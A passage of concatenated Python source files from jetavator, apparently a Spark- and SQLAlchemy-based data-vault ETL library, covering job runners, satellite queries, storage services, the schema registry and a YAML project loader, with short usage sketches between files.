from jetavator.schema_registry import SatelliteOwner
from .. import Job, Runner
class StarData(Job, ABC, register_as='star_data'):
"""
Computes the created, updated or deleted rows for the star schema table
for this particular `Hub` or `Link`.
:param runner: The `Runner` that created this object.
:param satellite_owner: The `Hub` or `Link` object that is being used to create
a Dimension or Fact table, respectively.
"""
def __init__(
self,
runner: Runner,
satellite_owner: SatelliteOwner
) -> None:
super().__init__(runner, satellite_owner)
self.satellite_owner = satellite_owner
@property
def name(self) -> str:
return f'updates_{self.satellite_owner.star_table_name}'
@property
def satellite_owner_keys_job(self) -> Job:
"""
:return: The `SatelliteOwnerKeys` job that contains the updated keys.
"""
return self.runner.get_job('satellite_owner_keys', self.satellite_owner)
@property
def satellite_query_jobs(self) -> List[Job]:
"""
:return: A list of the `SatelliteQuery` jobs that contain the updated data.
"""
return [
self.runner.get_job('satellite_query', satellite)
for satellite in self.satellite_owner.star_satellites.values()
]
@property
def dependencies(self) -> List[Job]:
return [
self.satellite_owner_keys_job,
*self.satellite_query_jobs
]
```
#### File: jetavator/runners/Runner.py
```python
from __future__ import annotations # Remove in Python 3.8
from abc import ABC
import pandas as pd
from logging import Logger
from typing import Dict, List, Type
from lazy_property import LazyProperty
from wysdom.mixins import RegistersSubclasses
from jetavator import Engine
from jetavator.schema_registry import Project, Source, Satellite, SatelliteOwner, VaultObject
from jetavator.services import ComputeService
from .Job import Job
from .JobState import JobState
from jetavator.runners.RunnerABC import RunnerABC
class Runner(RegistersSubclasses, RunnerABC, ABC):
job_class: Job = Job
def __init__(
self,
engine: Engine,
compute_service: ComputeService,
project: Project
):
"""
Default constructor to be inherited by subclasses.
Not intended for direct use: use
:py:meth:`from_compute_service` instead.
"""
super().__init__()
self.engine = engine
self.compute_service = compute_service
self.project = project
@classmethod
def from_compute_service(
cls,
engine: Engine,
compute_service: ComputeService,
project: Project
) -> Runner:
"""
Constructor that takes an :py:class:`~jetavator.Engine`,
a :py:class:`~jetavator.services.ComputeService` and
a :py:class:`~jetavator.schema_registry.Project`
and returns a registered subclass
of `Runner` as specified in `compute_service.config.type`
"""
return cls.registered_subclass_instance(
compute_service.config.type,
engine,
compute_service,
project
)
@property
def logger(self) -> Logger:
"""
Python `Logger` instance for raising log messages.
"""
return self.engine.logger
@LazyProperty
def jobs(self) -> Dict[str, Job]:
"""
Dictionary of all Jobs in the Runner, indexed by unique
string representation of the job key.
"""
return {
str(job.key): job
for job in self._create_jobs()
}
@property
def blocked_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are blocked from running by other jobs
that they depend on.
"""
return self.jobs_in_state([JobState.BLOCKED])
@property
def ready_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` whose dependencies have all finished and are
ready to start running.
"""
return self.jobs_in_state([JobState.READY])
@property
def running_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are currently running.
"""
return self.jobs_in_state([JobState.RUNNING])
@property
def finished_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that have recently finished, but are not yet
acknowledged by the Runner.
"""
return self.jobs_in_state([JobState.FINISHED])
@property
def acknowledged_jobs(self) -> Dict[str, Job]:
"""
Subset of `jobs` that are finished and acknowledged.
"""
return self.jobs_in_state([JobState.ACKNOWLEDGED])
def get_job(
self,
registered_name: str,
*args: VaultObject
) -> Job:
"""
:param registered_name: The registered subclass name of the job.
:param args: A variable-length list of `VaultObject` instances
associated with the Job. The number and types
of these objects depends on the subclass
implementation.
:return: An existing Job matching the supplied key values.
"""
return self.jobs[Job.job_key(registered_name, *args)]
def run(self) -> None:
"""
Run the workload management algorithm to run all the jobs
in dependency order.
"""
self._start_ready_jobs()
if not self.running_jobs and not self.finished_jobs:
raise RuntimeError("Dependency error. No jobs could be started.")
while self.running_jobs or self.finished_jobs:
self._check_for_finished_jobs()
if self.finished_jobs:
self._acknowledge_finished_jobs()
self._start_ready_jobs()
def jobs_in_state(self, states: List[JobState]) -> Dict[str, Job]:
"""
Return a dictionary of jobs in a list of states.
:param states: A list of `JobState`s to search for.
"""
return {
name: job
for name, job in self.jobs.items()
if job.state in states
}
def performance_data(self) -> pd.DataFrame:
"""
A Pandas `DataFrame` containing the queue, wait and execution
time for each job.
"""
return pd.DataFrame([
(
key,
'.'.join(job.primary_vault_object.key),
job.registered_name,
job.queue_time,
job.wait_time,
job.execution_time.total_seconds()
)
for key, job in self.jobs.items()
], columns=[
'key',
'primary_vault_object_key',
'class_name',
'queue_time',
'wait_time',
'execution_time'
])
def _check_for_finished_jobs(self) -> None:
for job in self.running_jobs.values():
job.check_if_finished()
def _acknowledge_finished_jobs(self) -> None:
for job in self.finished_jobs.values():
job.acknowledge()
def _start_ready_jobs(self) -> None:
self._find_ready_jobs()
for job in self.ready_jobs.values():
job.run()
def _find_ready_jobs(self) -> None:
for job in self.blocked_jobs.values():
job.check_if_ready()
def _create_jobs(self) -> List[Job]:
return [
job
for source in self.project.sources.values()
for job in self._create_source_jobs(source)
] + [
job
for satellite in self.project.satellites.values()
for job in self._create_satellite_jobs(satellite)
] + [
job
for satellite_owner in self.project.satellite_owners.values()
if satellite_owner.satellites_containing_keys
for job in self._create_satellite_owner_jobs(satellite_owner)
]
def _job_class_by_name(self, name: str) -> Type[Job]:
return self.job_class.registered_subclass(name)
def _create_source_jobs(self, source: Source) -> List[Job]:
jobs = [
self._job_class_by_name("create_source")(self, source)
]
if self.compute_service.source_csv_exists(source.name):
jobs += [
self._job_class_by_name("drop_source")(self, source)
]
return jobs
def _create_satellite_jobs(self, satellite: Satellite) -> List[Job]:
return [
*self._job_class_by_name("input_keys").keys_for_satellite(self, satellite),
self._job_class_by_name("satellite_query")(self, satellite),
*self._job_class_by_name("produced_keys").keys_for_satellite(self, satellite),
*self._job_class_by_name("output_keys").keys_for_satellite(self, satellite),
self._job_class_by_name("serialise_satellite")(self, satellite)
]
def _create_satellite_owner_jobs(self, satellite_owner: SatelliteOwner) -> List[Job]:
return [
self._job_class_by_name("satellite_owner_keys")(self, satellite_owner),
self._job_class_by_name("serialise_satellite_owner")(self, satellite_owner),
self._job_class_by_name("star_data")(self, satellite_owner),
self._job_class_by_name("star_merge")(self, satellite_owner)
]
```
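A brief sketch of how a `Runner` is typically obtained and driven, using only the methods defined above; the `engine`, `compute_service` and `project` objects are assumed to come from a configured jetavator `Engine`.
```python
# Hypothetical usage sketch -- engine, compute_service and project are placeholders.
runner = Runner.from_compute_service(engine, compute_service, project)
runner.run()                          # executes all jobs in dependency order
timings = runner.performance_data()   # pandas DataFrame of per-job timings
print(timings.sort_values('execution_time', ascending=False).head())
```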
#### File: spark_runner/jobs/SparkSatelliteQuery.py
```python
from pyspark.sql import DataFrame
from typing import Dict, Any, Set, Iterator
from collections.abc import Mapping
import jinja2
from lazy_property import LazyProperty
from sqlalchemy import Column, select, cast, alias, literal_column, text, func
from sqlalchemy.sql.expression import Select
from sqlalchemy.types import Boolean
from jetavator.runners.jobs import SatelliteQuery
from jetavator.sql_model.functions import hash_keygen, hash_record
from jetavator.services import SparkStorageService
from .. import SparkSQLView
class StorageViewConnector(object):
loaded_view_keys: Set[str] = None
storage_service: SparkStorageService = None
def __init__(self, storage_service: SparkStorageService):
self.loaded_view_keys = set()
self.storage_service = storage_service
def add(self, key: str) -> None:
if key not in self.loaded_view_keys:
self.loaded_view_keys.add(key)
def connect_storage_views(self):
for view_name in self.loaded_view_keys:
self.storage_service.connect_storage_view(view_name)
def disconnect_storage_views(self):
for view_name in self.loaded_view_keys:
self.storage_service.disconnect_storage_view(view_name)
class StorageTable(object):
def __init__(self, table_name: str):
self.table_name = table_name
class StorageViewMapping(Mapping):
connector: StorageViewConnector = None
view_names: Dict[str, str] = None
def __init__(self, connector: StorageViewConnector, view_names: Dict[str, str]):
self.connector = connector
self.view_names = view_names
def __getitem__(self, k: str) -> str:
if k not in self.view_names:
raise ValueError(k)
value = self.view_names[k]
if isinstance(value, StorageTable):
self.connector.add(value.table_name)
return value.table_name
else:
return value
def __getattr__(self, item):
return self.get(item)
def __len__(self) -> int:
return len(self.view_names)
def __iter__(self) -> Iterator[str]:
return iter(self.get(k) for k in self.view_names)
class SparkSatelliteQuery(SparkSQLView, SatelliteQuery, register_as='satellite_query'):
sql_template = '{{job.sql}}'
checkpoint = True
global_view = False
connector: StorageViewConnector = None
user_query_sql: str = None
def __init__(self, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
self.connector = StorageViewConnector(self.runner.compute_service.vault_storage_service)
if self.satellite.pipeline.type == "sql":
self.user_query_sql = jinja2.Template(self.satellite.pipeline.sql).render(self.table_aliases)
assert self.sql is not None
def execute(self) -> DataFrame:
self.connector.connect_storage_views()
result = super().execute()
self.connector.disconnect_storage_views()
return result
@LazyProperty
def table_aliases(self) -> Dict[str, Any]:
return {
'source': StorageViewMapping(self.connector, {
source.name: f'source_{source.name}'
for source in self.satellite.project.sources.values()
}),
'hub': {
hub.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_{hub.full_name}'),
'updates': (
'vault_updates'
f'_{hub.full_name}'
f'_{self.satellite.full_name}'
),
})
for hub in self.satellite.project.hubs.values()
},
'link': {
link.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_{link.full_name}'),
'updates': (
'vault_updates'
f'_{link.full_name}'
f'_{self.satellite.full_name}'
),
})
for link in self.satellite.project.links.values()
},
'satellite': {
satellite.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_now_{satellite.name}'),
'history': StorageTable(f'vault_history_{satellite.name}'),
'updates': f'vault_updates_{satellite.full_name}'
})
for satellite in self.satellite.project.satellites.values()
}
}
@property
def sql(self) -> str:
return self.runner.compute_service.compile_sqlalchemy(
self.pipeline_query())
def pipeline_query(self) -> Select:
if self.satellite.pipeline.type == "source":
return self.source_pipeline_query()
else:
return self.sql_pipeline_query()
def source_pipeline_query(self) -> Select:
source_table = self.satellite.pipeline.source.table
return self._build_pipeline_query(
source_query=source_table,
load_dt_column=source_table.c.jetavator_load_dt.label(
"sat_load_dt"),
deleted_ind_column=source_table.c.jetavator_deleted_ind.label(
"sat_deleted_ind")
)
def sql_pipeline_query(self) -> Select:
sql_query_columns = [
Column(key_column)
for key_column in self.satellite.pipeline.key_columns.values()
]
sql_query_columns += [
Column(column_name)
for column_name in self.satellite.columns.keys()
]
if self.satellite.pipeline.load_dt:
sql_query_columns.append(Column(self.satellite.pipeline.load_dt))
if self.satellite.pipeline.deleted_ind:
sql_query_columns.append(Column(self.satellite.pipeline.deleted_ind))
sql_query = alias(
text(self.user_query_sql).columns(*sql_query_columns),
name="sql_query"
)
if self.satellite.pipeline.load_dt:
load_dt_column = sql_query.c[self.satellite.pipeline.load_dt]
else:
load_dt_column = func.current_timestamp()
if self.satellite.pipeline.deleted_ind:
deleted_ind_column = sql_query.c[self.satellite.pipeline.deleted_ind]
else:
deleted_ind_column = literal_column("FALSE")
return self._build_pipeline_query(
source_query=sql_query,
load_dt_column=load_dt_column.label("sat_load_dt"),
deleted_ind_column=deleted_ind_column.label("sat_deleted_ind")
)
def _build_pipeline_query(
self,
source_query: Select,
load_dt_column: Column,
deleted_ind_column: Column
) -> Select:
source_inner_query = select([
*[
source_query.c[key_column].label(f"hub_{hub_name}_key")
for hub_name, key_column in self.satellite.pipeline.key_columns.items()
],
*[
cast(source_query.c[column.name], column.type).label(column.name)
for column in self.satellite.satellite_columns
],
load_dt_column,
cast(deleted_ind_column, Boolean()).label(deleted_ind_column.name)
]).alias("source_inner_query")
new_satellite_rows = alias(
select([
self.satellite.parent.generate_key(
source_inner_query
).label(self.satellite.parent.key_name),
*[
source_inner_query.c[column.name]
for column in self.satellite.parent.link_key_columns
],
func.coalesce(
source_inner_query.c.sat_load_dt,
func.current_timestamp()
).label("sat_load_dt"),
func.coalesce(
source_inner_query.c.sat_deleted_ind,
literal_column("FALSE")
).label("sat_deleted_ind"),
literal_column(f"'{self.satellite.name}'").label("sat_record_source"),
hash_record(
source_inner_query,
"sat_deleted_ind",
self.satellite.columns
).label("sat_record_hash"),
*[
source_inner_query.c[column_name]
for column_name in self.satellite.columns
]
]),
"new_satellite_rows"
)
def generate_table_keys(satellite_owner, source_table):
if satellite_owner.option("hash_key"):
hash_key = [hash_keygen(
source_table.c[satellite_owner.alias_key_name(satellite_owner.name)]
).label(satellite_owner.alias_hash_key_name(satellite_owner.name))]
else:
hash_key = []
return hash_key + [
source_table.c[satellite_owner.alias_key_name(satellite_owner.name)]
]
select_query = select([
*generate_table_keys(
self.satellite.parent,
new_satellite_rows),
*[
new_satellite_rows.c[column.name]
for column in self.satellite.parent.link_key_columns
],
new_satellite_rows.c.sat_load_dt,
new_satellite_rows.c.sat_deleted_ind,
new_satellite_rows.c.sat_record_source,
new_satellite_rows.c.sat_record_hash,
*[
new_satellite_rows.c[column_name]
for column_name in self.satellite.columns
]
])
return select_query
```
#### File: spark_runner/jobs/SparkSerialiseSatellite.py
```python
from pyspark.sql import DataFrame
from .. import SparkJob
from jetavator.runners.jobs import SerialiseSatellite
class SparkSerialiseSatellite(SparkJob, SerialiseSatellite, register_as='serialise_satellite'):
def execute(self) -> DataFrame:
return self.runner.compute_service.vault_storage_service.write_table(
table_name=self.satellite.table_name,
df=self.spark.table(self.satellite_query_job.name)
)
```
#### File: spark_runner/jobs/SparkStarMerge.py
```python
from pyspark.sql import DataFrame
from .. import SparkJob
from jetavator.runners.jobs import StarMerge
class SparkStarMerge(SparkJob, StarMerge, register_as='star_merge'):
def execute(self) -> DataFrame:
return self.runner.compute_service.star_storage_service.merge_from_spark_view(
storage_table_name=self.satellite_owner.star_table_name,
spark_view_name=self.star_data_job.name,
key_column_name=self.satellite_owner.key_column_name,
column_names=[
self.satellite_owner.key_column_name,
*(x.name for x in self.satellite_owner.link_key_columns),
*self.star_column_references.keys()
],
column_references=self.star_column_references
)
```
#### File: runners/spark_runner/SparkView.py
```python
from abc import ABC, abstractmethod
from pyspark.sql import DataFrame
from . import SparkJob, SparkSQLJob
LOG_ROW_COUNTS = True
SAMPLE_N_ROWS = 10
class SparkView(SparkJob, ABC):
"""
Base class for all Spark jobs that are registered in the metastore
as a temporary view after execution.
"""
@property
@abstractmethod
def checkpoint(self) -> bool:
"""
        This property should be set to True if a Spark local
checkpoint should be created for the resulting DataFrame.
"""
pass
@property
@abstractmethod
def global_view(self) -> bool:
"""
This property should be set to True if the temporary view
should be registered as a global view in the metastore.
"""
pass
@abstractmethod
def execute_view(self) -> DataFrame:
"""
Construct the underlying Spark DataFrame for this view.
"""
pass
def execute(self) -> DataFrame:
df = self.execute_view()
if self.checkpoint:
df = df.localCheckpoint()
# TODO: Make LOG_ROW_COUNTS configurable
if LOG_ROW_COUNTS:
self.logger.info(f'Row count: {self.name} ({df.count()} rows)')
# TODO: Make SAMPLE_N_ROWS configurable
if SAMPLE_N_ROWS:
df.limit(SAMPLE_N_ROWS).write.format("json").save(
f".jetavator/debug_samples"
f"/{self.runner.engine.config.session.run_uuid}/{self.name}.json")
if self.global_view:
df = df.createOrReplaceGlobalTempView(self.name)
else:
df = df.createOrReplaceTempView(self.name)
return df
class SparkSQLView(SparkView, SparkSQLJob, ABC):
"""
Base class for all Spark jobs that register a temporary view and
generate declarative Spark SQL to produce that view.
"""
def execute_view(self) -> DataFrame:
return self.execute_sql()
```
#### File: jetavator/schema_registry/SQLAlchemyRegistryService.py
```python
from typing import Union, Tuple, Iterator, Any
from collections.abc import Mapping
from jetavator.schema_registry.Project import Project
from jetavator.schema_registry.sqlalchemy_tables import Deployment
from jetavator.schema_registry.RegistryService import RegistryService
class SQLAlchemyRegistryService(RegistryService, Mapping, register_as="sqlalchemy_registry"):
loaded: Project = None
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
if self.config.model_path:
self.load_from_disk()
else:
self.load_from_database()
def __getitem__(
self,
key: Union[str, Tuple[str, str]]
) -> Project:
session = self.compute_service.session()
deployment = session.query(Deployment).get(key)
return Project.from_sqlalchemy_object(
self.config, self.compute_service, deployment)
def __len__(self) -> int:
return len(list(self.session().query(Deployment)))
def __iter__(self) -> Iterator[str]:
return iter(
deployment.version
for deployment in self.session().query(Deployment)
)
def session(self):
return self.owner.compute_service.session()
def load_from_disk(self) -> None:
self.loaded = Project.from_directory(
self.config,
self.compute_service,
self.config.model_path)
def load_from_database(self) -> None:
self.loaded = self.deployed
# TODO: Implement storage/retrieval of deployed definitions on Spark/Hive
@property
def deployed(self) -> Project:
# self.compute_service.test()
# session = self.compute_service.session()
# try:
# deployment = session.query(Deployment).order_by(
# Deployment.deploy_dt.desc()).first()
# retry = False
# except (ProgrammingError, OperationalError):
# deployment = Deployment()
# retry = False
        # # If there is no deployment on Spark/Hive, the query above fails.
        # # For now, a loose fix is applied by the if statement below; this needs
        # # to be replaced with more robust logic in future.
# if deployment is None:
# deployment = Deployment()
# return Project.from_sqlalchemy_object(self, deployment)
return Project.from_sqlalchemy_object(
self.config, self.compute_service, Deployment())
def write_definitions_to_sql(self) -> None:
session = self.compute_service.session()
session.add(self.loaded.export_sqlalchemy_object())
session.add_all([
object_definition.export_sqlalchemy_object()
for object_definition in self.loaded.values()
])
session.commit()
session.close()
self.load_from_database()
```
#### File: jetavator/schema_registry/VaultObject.py
```python
from __future__ import annotations
from typing import Any, Dict, List
from abc import ABC, abstractmethod
from datetime import datetime
from collections import namedtuple
from lazy_property import LazyProperty
from .sqlalchemy_tables import ObjectDefinition
import wysdom
from jetavator.services import ComputeServiceABC
from .ProjectABC import ProjectABC
VaultObjectKey = namedtuple('VaultObjectKey', ['type', 'name'])
HubKeyColumn = namedtuple('HubKeyColumn', ['name', 'source'])
class VaultObject(wysdom.UserObject, wysdom.RegistersSubclasses, ABC):
name: str = wysdom.UserProperty(str)
type: str = wysdom.UserProperty(str)
optional_yaml_properties = []
def __init__(
self,
project: ProjectABC,
sqlalchemy_object: ObjectDefinition
) -> None:
self.project = project
self._sqlalchemy_object = sqlalchemy_object
super().__init__(self.definition)
def __repr__(self) -> str:
class_name = type(self).__name__
return f'{class_name}({self.name})'
@classmethod
def subclass_instance(
cls,
project: ProjectABC,
definition: ObjectDefinition
) -> VaultObject:
return cls.registered_subclass_instance(
definition.type,
project,
definition
)
@LazyProperty
def key(self) -> VaultObjectKey:
return VaultObjectKey(self.type, self.name)
@property
def definition(self) -> Dict[str, Any]:
return self._sqlalchemy_object.definition
def export_sqlalchemy_object(self) -> ObjectDefinition:
if self._sqlalchemy_object.version != str(self.project.version):
raise ValueError(
"ObjectDefinition version must match project version "
"and cannot be updated."
)
self._sqlalchemy_object.deploy_dt = str(datetime.now())
return self._sqlalchemy_object
@abstractmethod
def validate(self) -> None:
pass
@property
def compute_service(self) -> ComputeServiceABC:
return self.project.compute_service
@property
def full_name(self) -> str:
return f'{self.type}_{self.name}'
@property
def checksum(self) -> str:
return str(self._sqlalchemy_object.checksum)
@property
def dependent_satellites(self) -> List[VaultObject]:
return [
satellite
for satellite in self.project.satellites.values()
if any(
dependency.type == self.type
and dependency.name == self.name
for dependency in satellite.pipeline.dependencies
)
]
```
#### File: schema_registry/vault_object_types/Column.py
```python
import wysdom
from jetavator.schema_registry.vault_object_types.ColumnType import ColumnType
class Column(wysdom.UserObject):
_type: str = wysdom.UserProperty(str, name="type")
@property
def type(self) -> ColumnType:
return ColumnType(self._type)
```
#### File: schema_registry/vault_object_types/Link.py
```python
from typing import Dict
from sqlalchemy import literal_column, func
import wysdom
from ..VaultObject import HubKeyColumn
from .SatelliteOwner import SatelliteOwner
from .Hub import Hub
from .Satellite import Satellite
from .ColumnType import ColumnType
SEPARATOR = 31 # ASCII unit separator control character
class Link(SatelliteOwner, register_as="link"):
star_prefix = "fact"
# TODO: Rename link_hubs to hubs
_link_hubs: Dict[str, str] = wysdom.UserProperty(
wysdom.SchemaDict(str), name='link_hubs')
@property
def hubs(self) -> Dict[str, Hub]:
return {
k: self.project['hub', v]
for k, v in self._link_hubs.items()
}
@property
def satellites_containing_keys(self) -> Dict[str, Satellite]:
return self.star_satellites
@property
def key_length(self) -> int:
return sum([
hub.key_length + 1
for hub in self.hubs.values()
]) - 1
@property
def key_type(self) -> ColumnType:
return ColumnType(f"CHAR({self.key_length})")
@property
def unique_hubs(self) -> Dict[str, Hub]:
return {
hub_name: self.project["hub", hub_name]
for hub_name in set(x.name for x in self.hubs.values())
}
def hub_key_columns(self, satellite) -> Dict[str, HubKeyColumn]:
columns = {}
for alias, hub in self.hubs.items():
columns.setdefault(hub.name, []).append(
HubKeyColumn(f'hub_{alias}_key', f'hub_{hub.name}'))
return columns
def generate_key(self, from_table):
key_components = iter([
hub.prepare_key_for_link(hub_alias, from_table)
for hub_alias, hub in self.hubs.items()
])
composite_key = next(key_components)
for column in key_components:
composite_key = composite_key.concat(
func.char(literal_column(str(SEPARATOR)))
).concat(column)
return composite_key
@property
def link_key_columns(self):
return [
hub.alias_key_column(hub_alias)
for hub_alias, hub in self.hubs.items()
]
def validate(self) -> None:
for k, v in self._link_hubs.items():
if ('hub', v) not in self.project:
raise KeyError(
f"Cannot find referenced hub {v} in object {self.key}"
)
```
#### File: vault_object_types/pipelines/SatelliteSourcePipeline.py
```python
from typing import Dict, List
import wysdom
from .SatellitePipeline import SatellitePipeline
from .SatellitePipelineDependency import SatellitePipelineDependency
from ..Source import Source
class SatelliteSourcePipeline(
SatellitePipeline,
register_as="source"
):
type: str = wysdom.UserProperty(wysdom.SchemaConst('source'))
_source: str = wysdom.UserProperty(str, name="source")
@property
def key_columns(self) -> Dict[str, str]:
if self._key_columns:
return self._key_columns
else:
return {
key_column: source_column
for key_column, source_column in zip(
self.satellite.parent.hubs.keys(),
self.source.columns.keys()
)
}
@property
def source(self) -> Source:
# TODO: Refactor so this definitely returns Source, not VaultObject
source_obj = self.project["source", self._source]
assert isinstance(source_obj, Source)
return source_obj
@property
def dependencies(self) -> List[SatellitePipelineDependency]:
return [
SatellitePipelineDependency(
{'name': self._source, 'type': 'source'},
json_dom_info=wysdom.dom.DOMInfo(
document=wysdom.document(self), parent=self)
)
]
```
#### File: jetavator/schema_registry/YamlProjectLoader.py
```python
from typing import Any, Dict, List
import os
import yaml
from re import match
from contextlib import contextmanager
class YamlProjectLoader(object):
def __init__(
self,
model_path: str,
extension: str = "yaml"
) -> None:
self._model_path = model_path
self._extension = extension
def load_files(self) -> List[Dict[str, Any]]:
with self._cwd(self._model_path):
return [
self.load_yaml(
os.path.join(path, file)
)
for path, dirs, files in os.walk(".")
for file in files
if match(r"^.*\." + self._extension + "$", file)
]
@staticmethod
def load_yaml(file: str) -> Dict[str, Any]:
with open(file) as stream:
return yaml.safe_load(stream)
@staticmethod
@contextmanager
def _cwd(path):
old_pwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_pwd)
```
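A quick sketch of the loader in isolation; the model path is a placeholder.
```python
# Hypothetical usage sketch -- './models' is a placeholder directory.
loader = YamlProjectLoader(model_path='./models')
definitions = loader.load_files()   # one dict per *.yaml file found under the path
print(len(definitions), 'definitions loaded')
```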
#### File: jetavator/services/SparkService.py
```python
from typing import Iterable, List, Set
from abc import ABC
import datetime
import os
import tempfile
import numpy as np
import pyspark
import sqlalchemy
import pandas
from pyspark.sql import SparkSession
from lazy_property import LazyProperty
from jetavator.sqlalchemy_delta import HiveWithDDLDialect
from .ComputeService import ComputeService
from .HiveMetastoreInterface import HiveMetastoreInterface
from .ExecutesSparkSQL import ExecutesSparkSQL
SPARK_APP_NAME = 'jetavator'
PYSPARK_COLUMN_TYPE_MAPPINGS = [
(sqlalchemy.types.String, pyspark.sql.types.StringType),
(sqlalchemy.types.Integer, pyspark.sql.types.IntegerType),
(sqlalchemy.types.Float, pyspark.sql.types.DoubleType),
(sqlalchemy.types.Date, pyspark.sql.types.DateType),
(sqlalchemy.types.DateTime, pyspark.sql.types.TimestampType)
]
def pyspark_column_type(sqlalchemy_column):
for sqlalchemy_type, pyspark_type in PYSPARK_COLUMN_TYPE_MAPPINGS:
if isinstance(sqlalchemy_column.type, sqlalchemy_type):
return pyspark_type()
class SparkService(ComputeService, ExecutesSparkSQL, HiveMetastoreInterface, ABC):
@property
def sqlalchemy_dialect(self) -> sqlalchemy.engine.interfaces.Dialect:
return HiveWithDDLDialect()
@LazyProperty
def spark(self):
builder = (
SparkSession
.builder
.appName(SPARK_APP_NAME)
.enableHiveSupport()
.config("spark.ui.showConsoleProgress", False)
.config("spark.jars.packages", ",".join(self.all_spark_jars_packages))
)
for storage_service in self.storage_services.values():
for k, v in storage_service.spark_config_options.items():
builder = builder.config(k, v)
spark_session = builder.getOrCreate()
spark_session.sparkContext.setLogLevel('ERROR')
return spark_session
@property
def spark_jars_packages(self) -> List[str]:
return []
@property
def all_spark_jars_packages(self) -> Set[str]:
return {
*self.spark_jars_packages,
*(
package
for storage_service in self.storage_services.values()
for package in storage_service.spark_jars_packages
)
}
def load_dataframe(
self,
dataframe: pandas.DataFrame,
source_name: str,
source_column_names: Iterable[str]
) -> None:
for column in source_column_names:
if column not in dataframe.columns:
dataframe[column] = np.nan
if 'jetavator_load_dt' not in dataframe.columns:
dataframe['jetavator_load_dt'] = datetime.datetime.now()
if 'jetavator_deleted_ind' not in dataframe.columns:
dataframe['jetavator_deleted_ind'] = 0
columns = list(source_column_names) + [
'jetavator_load_dt',
'jetavator_deleted_ind'
]
filename = f'{source_name}.csv'
with tempfile.TemporaryDirectory() as temp_path:
temp_csv_file = os.path.join(temp_path, filename)
(
dataframe
.reindex(
columns=columns)
.to_csv(
temp_csv_file,
index=False)
)
self.load_csv(temp_csv_file, source_name)
def load_csv(self, csv_file, source_name: str):
raise NotImplementedError
def csv_file_path(self, source_name: str):
raise NotImplementedError
def table_delta_path(self, sqlalchemy_table):
return (
'/tmp'
f'/{self.config.schema}'
f'/{sqlalchemy_table.name}'
)
def prepare_environment(self) -> None:
# TODO: Make this platform-independent - currently HIVE specific
# TODO: Is this obsolete now?
self.execute(
f'USE `{self.config.schema}`'
)
def sql_query_single_value(self, sql):
return self.execute(sql).iloc[0, 0]
def test(self):
assert self.sql_query_single_value("SELECT 1") == 1
return True
```
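A sketch of feeding a pandas DataFrame into `load_dataframe`. Note that `SparkService` is abstract here: `load_csv` must be supplied by a concrete subclass (such as the `LocalDatabricksService` earlier in this collection), so `spark_service` below is assumed to be an instance of such a subclass.
```python
import pandas as pd

# Hypothetical usage sketch -- spark_service is assumed to be a concrete SparkService
# subclass that implements load_csv; the source name and columns are placeholders.
df = pd.DataFrame({'customer_id': [1, 2], 'name': ['Ada', 'Grace']})
spark_service.load_dataframe(
    dataframe=df,
    source_name='customer',
    source_column_names=['customer_id', 'name', 'country'],  # missing columns become NaN
)
```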
#### File: jetavator/services/StorageService.py
```python
from abc import ABC, abstractmethod
from typing import Iterable, Any, Dict, Optional, Set
import sqlalchemy
import sqlalchemy_views
import pandas
from jetavator import EngineABC
from jetavator.config import StorageServiceConfig
from .Service import Service
from .ComputeOwnedService import ComputeOwnedService
from .StorageServiceABC import StorageServiceABC
from .ExecutesSQL import ExecutesSQL
class StorageService(
ComputeOwnedService,
Service[StorageServiceConfig],
ExecutesSQL,
StorageServiceABC,
ABC
):
@property
def engine(self) -> EngineABC:
return self.owner.engine
def create_schema_if_missing(self) -> None:
if self.schema_exists:
if self.config.drop_schema_if_exists:
self.logger.info('Dropping and recreating database')
self.drop_schema()
self.create_schema()
elif (
not self.schema_empty
and not self.engine.config.skip_deploy
):
raise Exception(
f"Database {self.config.schema} already exists, "
"is not empty, and config.drop_schema_if_exists "
"is set to False."
)
else:
self.logger.info(f'Creating database {self.config.schema}')
self.create_schema()
def create_table(self, sqlalchemy_table: sqlalchemy.schema.CreateTable) -> None:
self.execute_sql_element(sqlalchemy_table)
def create_tables(
self,
sqlalchemy_tables: Iterable[sqlalchemy.schema.CreateTable]
) -> None:
for table in sqlalchemy_tables:
self.create_table(table)
def create_view(self, sqlalchemy_view: sqlalchemy_views.CreateView) -> None:
self.execute_sql_element(sqlalchemy_view)
def create_views(
self,
sqlalchemy_views: Iterable[sqlalchemy_views.CreateView]
) -> None:
for view in sqlalchemy_views:
self.create_view(view)
def execute_sql_elements_async(
self,
sql_elements: Iterable[sqlalchemy.sql.expression.ClauseElement]
) -> None:
# TODO: Implement async execution
for element in sql_elements:
self.execute_sql_element(element)
@abstractmethod
def sql_query_single_value(self, sql: str) -> Any:
pass
def execute_sql_element(
self,
sqlalchemy_element: sqlalchemy.sql.expression.ClauseElement,
async_cursor: bool = False
) -> pandas.DataFrame:
# TODO: Implement or deprecate async_cursor
return self.execute(self.compile_sqlalchemy(sqlalchemy_element))
@abstractmethod
def test(self) -> None:
pass
@property
def index_option_kwargs(self) -> Set[str]:
return set()
@abstractmethod
def load_dataframe(
self,
dataframe: pandas.DataFrame,
source_name: str,
source_column_names: Iterable[str]
) -> None:
pass
@abstractmethod
def merge_from_spark_view(
self,
storage_table_name: str,
spark_view_name: str,
key_column_name: str,
column_names: Iterable[str],
column_references: Dict[str, str],
deleted_indicator: Optional[str] = None
):
pass
```
#### File: jetavator/sql_model/ProjectModel.py
```python
from typing import List
from lazy_property import LazyProperty
from sqlalchemy.schema import DDLElement
from sqlalchemy import MetaData
from jetavator.sql_model.ProjectModelABC import ProjectModelABC
from jetavator.config import Config
from jetavator.services import ComputeService
from jetavator.schema_registry import Project, VaultObjectMapping
from .BaseModel import BaseModel
from .SatelliteModel import SatelliteModel
SCHEMAS = [
"jetavator",
"source",
"source_history",
"source_error",
"source_updates",
"vault",
"vault_history",
"vault_updates",
"vault_now",
"star",
]
class ProjectModel(VaultObjectMapping[BaseModel], ProjectModelABC):
def __init__(
self,
config: Config,
compute_service: ComputeService,
new_definition: Project,
old_definition: Project
) -> None:
super().__init__()
self._config = config
